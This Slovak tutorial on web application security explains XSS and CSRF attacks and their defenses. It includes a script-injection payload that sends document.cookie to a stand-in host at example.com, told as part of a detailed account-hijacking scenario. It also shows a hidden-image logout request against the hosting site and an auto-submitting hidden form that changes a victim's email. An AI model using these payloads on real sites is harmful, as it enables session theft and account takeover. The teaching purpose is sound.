LINUXSOFT.cz Přeskoč levou lištu
Uživatel: Heslo:  
   CZUKPL

> Bezpečnosť webovej aplikácie II.

V tomto pokračovaní nášho malého tutoriálu si ukážeme, ako vyzerajú, ako fungujú a ako sa brániť proti zraniteľnostiam Cross-Site-Scripting (XSS) a Cross Site Request Forgery (CSRF/XSRF).

11.3.2012 00:00 | Marek Beleščiak | Články autora | přečteno 3106×

Princíp týchto zraniteľností spočíva v neošetrenom vstupe na danej www stránky - útočník na tomto základe podstrčí vlastný javascriptový kód. Pomocou týchto zraniteľnosti vám môže prebrať cookies, ukradnúť session alebo dokonca vám aj zmeniť údaje o účte bez toho aby ste o tom vedeli jediným navštívením nebezpečnej stránky.

XSS

Tento útok spočíva v tom, že podstrčíte aplikácií dáta, ktorej jej samotnej neuškodia ale vrátia sa neodfiltrované na výstup k užívateľovi. Veľmi dobrý príklad môže byť odoslanie formulára, keď nastane niekde chyba, väčšinou vám ostanú údaje vyplnené aby ste ich nemuseli vyplňovať odznova.

Zoberme si nasledujúci príklad, ktorý by mal všetko demonštrovať:

<input name="username" value="">

Aplikácii odošleme toto políčko s obsahom "><script>alert('XSS');</script> dostali by sme tento výsledok:

<input name="username" value=""><script>alert('XSS')</script>">

V takejto podobe sa nám do prehliadača vratí daný kód, čím sa vykoná daný javascriptový kód. S menšou úpravou môže byť veľmi nebezpečný.

Existujú 3 typy XSS a to sú persistent (stály), non-persistent (nestály) a local (lokálny, často sa označuje ako HTML Injection).

Persistent

Táto metóda sa využíva napr. v guestbooku. Pokiaľ aplikácia nevyužíva na výstupe filter, a tým pádom sa neošetria html tagy a vrátia sa klientovi - problém je na svete. Aplikácia uloží nebezpečný kód a potom každému, kto navštívi guestbook vráti nebezpečný kód, ktorý sa vykoná u každého klienta.

Persistent XSS Attacker -> Storage Persistent XSS Storage -> Client

Správna cesta by mala byť od útočníka do úložiska. Cesta ku klientovi by ale mala viesť cez filter:

Persistent XSS Storage -> Filter -> Client

Non-Persistent

Tento spôsob je veľmi podobný predošlému persistent, s tým rozdielom, že infikovanú adresu aplikácie má len útočník. Tento spôsob je síce najmenej nebezpečný ale je veľmi podceňovaný, čo je veľká chyba.

Malý príklad: predstavte si stránku na ktorej je prihlásenie, registrácia, fórum. Útočník našiel na stránke 'vytvoriť novú tému' nestálu XSS zraniteľnosť. Zriadil si free-hosting s dómenou www.example.com, na ktorej mal skript, ktorý ukladal všetko, čo dostal zo vstupu. Na stránke s diskusiou si pripravil a vyšperkoval svoj nebezpečný kód. Ten odoslal všetky cookies cez new Image().src='http://www.example.com/?c='+document.cookie na svoj nachystaný skript na www.example.com. Svoj nebezpečný kód fungoval takto: zakryl celú stránku na čierno, aby nebolo vidno, že ide práve o danú lokalitu. Potom ihned odoslal cookies. A nakoniec sa spustila hra na hádanie čisla od 0 do 100. Útočník potom túto veľmo dlhú url zmenil zapomoci url shortenera tinyurl.com. Potom napísal novú tému s tým, že našiel na nete výbornú hru, v ktorej máte hádať číslo od 0 do 100 a pod to dal novú skrátenú adresu. Každý kto klikol na tento odkaz prišiel o svoj účet! Útočník svoje úložisko pravidelne kontroloval a tým pádom mohol ihneď reagovať skôr než sa užívateľovi skončí jeho relácia. Serveru odoslal požiadavku s danými cookies. Kedže server ho identifikoval ako pôvodného užívateľa, útočník sa ocitol prihlásený za užívateľa a ani na to nepotreboval žiadne heslo!...

Local

Lokálne XSS sa často označuje aj ako infikovanie HTML (HTML injection). Kód je spustený na strane klienta a práve na strane klienta dochádza k infikovaniu html. Príkladom môže byť napr. dynamické vloženie html obsahu bez žiadneho filtru:

<script>
	var a = window.location.search.indexOf("text=") + 5;
	document.getElementsByTagName("div")[0].innerHTML = a;
</script>
	

Obrana

Zo strany vývojára treba byť paranoidný ku každému vstupu. Neverte ani vlastným databázam! Každé dáta, ktoré idete poslať klientovi musíte dobre ošetriť problémové znaky (hlavne: <, >, ", ', (, ) ). Toto isté platí aj pre dáta od server poslané javascriptu (napr. cez ajax) a tiež ošetriť dané znaky, aby sa nevyskytovali v novom dynamickom html obsahu. Ďalším veľmi významným opatrením je nastaviť všetkým cookies, ktoré nemajú čo javascript zaujímať nastaviť httpOnly atribút, ktorý zariadi aby daná cookie bola posielaná len cez medzi prehliadačom a serverom a žiadne skripty k nej nebudú mať prístup.

Zo strany klienta je obrana pomerne náročná. Pre firefox je tu plugin NoScript. Google Chrome ma svoju ochranu proti XSS už integrovanú takým spôsobom, že ak sa odoslané dáta nachádzajú v odpovedi, hodi error/warning do konzoly a daný kúsok kódu odignoruje.

CSRF / XSRF

Pre správne pochopenie tohto útoku je nutné vedieť ako funguje protokol HTTP.

Web server cez HTTP protokol nevie identifikovať návštevníka, to až po poslaní cookies. Tento útok dokáže na poslanie parametrov stránke použiť rovnako GET aj POST metódu. Obe metódy sú úplne rovnake postihnuté. Vždy, keď váš prehliadač posiela požiadavku stránke, zahrnie tam všetko, vrátane cookies, teda vašej identifikácie. Keďže server nevie určiť od koho požiadavka naozaj pochádza, vyhodnotí ju ako legitímnu požiadavku a následne ju spracuje.

Vezmime si napríklad URL pre odhlásenie z linuxsoftu:

GET /odhlas.php HTTP/1.1

Keby ste na svoju stránku umiestnili kód:

<img src="http://www.linuxsoft.cz/odhlas.php" style="display:none;">

Každý, kto by navštívil vašu stránku, jeho prehliadač by chcel prehliadač stiahnuť aj obrázok "/odhlas.php" na linuxsoft.cz. Prehliadač musí vytvoriť požiadavku a odoslať ju na linuxsoft.cz, ktorému odošle všetky dáta, cookies. Server na ich základe usúdi, že sa jedná o vás a vašu žiadosť o odhlásenie. Dojde k odhláseniu. Skúste sa prihlásiť stlačiť toto tlačitko a obnoviť stránku a budete odhlásení.

Teraz si predstavte, že rovnako je postihnutá aj metóda POST, je trošku zložitejšia ale nieje to nič extra. Rozhodol som sa uviesť malý príklad na zmenu emailu. Predstavte si, že formulár na originálnej stránke je nasledujúci:

<form method="post" action="/email.cgi">
	<input type="text" name="email">
	<input type="submit" value="submit">
</form>
	

Odoslanie tohto formulára pod identitou užívateľa nieje nič náročné. Náš kód na nebezpečnej stránke môže vyzerať napr. takto:

<iframe style="display:none" name="ifr"></iframe>
<form method="post" action="http://www.example.com/email.cgi" style="display:none;" 
target="ifr" name="ifr_form">
	<input type="hidden" name="email" value="exam@ple.com">
</form>
<script type="text/javascript">
window.forms['ifr_form'].submit();
</script>
	

Po navštívení tejto stránky sa ihneď odošle formulár na zmenu emailu. Pokiaľ obeť je prihlasená, email sa zmení, čo znamená, že zmeniť si heslo cez zabudnuté heslo a následné poslanie na nový email je už to najmenej.

Obrana

CSRF je nebezpečný typ útoku a obrana proti nemu nieje ľahká. No určite je nutné, aby ste kontrolovali hlavičku referer, ak je dostupná. Ďalši najefektívnejší spôsob je otokenovať každý formulár, to znamená, že ku každému vstupu priradíte uníkátny reťazec. Kedže ho útočník dopredu nevie určiť, útok nemá veľkú šancu. Určite by bolo dobré keby ste k tomuto tokenu ukladali IP ktorá daný token "vytvorila" a nakonci ho porovnať s IP ktorá tento token odoslala. Ak sa nezhodujú nemôžete pokračovať! Ďalšou dobrou ochranou je captcha, ktorá bola pôvodne navrhnutá ako antispamové riešenie.

Verze pro tisk

pridej.cz

 

DISKUZE

Nejsou žádné diskuzní příspěvky u dané položky.



Příspívat do diskuze mohou pouze registrovaní uživatelé.
> Vyhledávání software
> Vyhledávání článků

31.7.2014 7:13 /MaReK Olšavský
Nové verze se dočkali uživatelé LibreOffice, jimž aktualizace na verzi 4.3 přinese například lepší podporu OOXML, podporu monstrózních odstavců, nebo vylepšení pivot tabulek. BTW: V ČR brzy vyjde kniha o LO Writeru.
Přidat komentář

31.7.2014 7:13 /MaReK Olšavský
Někteří zarytí programátoři v PHP možná pamatují PHP-GTK, díky němuž mohli svůj oblíbený jazyk využívat i pro napsání desktopové aplikace. Nový projekt wxPHP (neboli wxWidgets for PHP) umožňuje totéž, leč nad projektem lépe použitelným napříč různými OS. (Na málo známý projekt Upozornil Michael Larabel.)
Přidat komentář

31.7.2014 7:13 /MaReK Olšavský
Magelan představil svou první navigaci s Androidem. Ostatní navigace zatím využívají Windows Mobile. Do světa navigací a map patří i oznámení Canonicalu o nasazení Nokia HERE do Ubuntu for Phones.
Přidat komentář

30.7.2014 7:18 /MaReK Olšavský
O roli svobodného software ve vzdělávání se začalo mluvit především v souvislosti s nástupem online školení/kurzů. F/L/OSS jako klíčovou součást vzdělávání vyzdvihujá i Anant Agarwal, CEO EDx.
Přidat komentář

30.7.2014 7:18 /MaReK Olšavský
Do Debianu 8 by se nejspíše mohl vrátit FFmpeg. „Válka“ FFmpeg vs. Libav tak bude pokračovat i na „území Debianu“.
Přidat komentář

30.7.2014 7:18 /MaReK Olšavský
VLC je mocný nástroj pro práci s A/V daty, ale většina uživatelů používá pouze přehrávač. Sílu VLC, ve spojení s dalšími svobodnými nástroji, poodkrývá článek Sama Deana, doplněný odkazy na podrobnosti o jednotlivých nástrojích.
Přidat komentář

28.7.2014 7:06 /MaReK Olšavský
Dalším úspěšným příkladem nemalé finanční úspory díky F/L/OSS se stalo francouzské město Toulouse, jež má ušetřeno 1 mil. € po přechodu na LibreOffice. Změnili jen kancelářský balík, příklad Mnichova, kompletní přechod na F/L/OSS, by určitě znamenal vyšší úsporu.
Přidat komentář

28.7.2014 7:06 /MaReK Olšavský
Těžba bitcoinů s Raspberry Pi zní jako nesmysl, ale článek na webu Linux User ukazuje, že to jde. Velké množství vytěžených bitcoinů však nečekejte, vzhledem k výkonu RPi.
Přidat komentář

   Více ...   Přidat zprávičku

> Poslední diskuze

1.8.2014 2:25 / Aleš Hakl
Re: Naprogramování ATmega328

30.7.2014 22:04 / Petr Ježek
DVB-T

27.7.2014 17:55 / Jabu
Re: instalace modemu Huawei E352 v Ubuntu 14.04

25.7.2014 7:06 / MaReK Olšavský
Re: ksplice

24.7.2014 8:06 / Stanislav David
ksplice

Více ...

ISSN 1801-3805 | Provozovatel: Pavel Kysilka, IČ: 72868490 (2003-2014) | mail at linuxsoft dot cz | Design: www.megadesign.cz | Textová verze | zákony online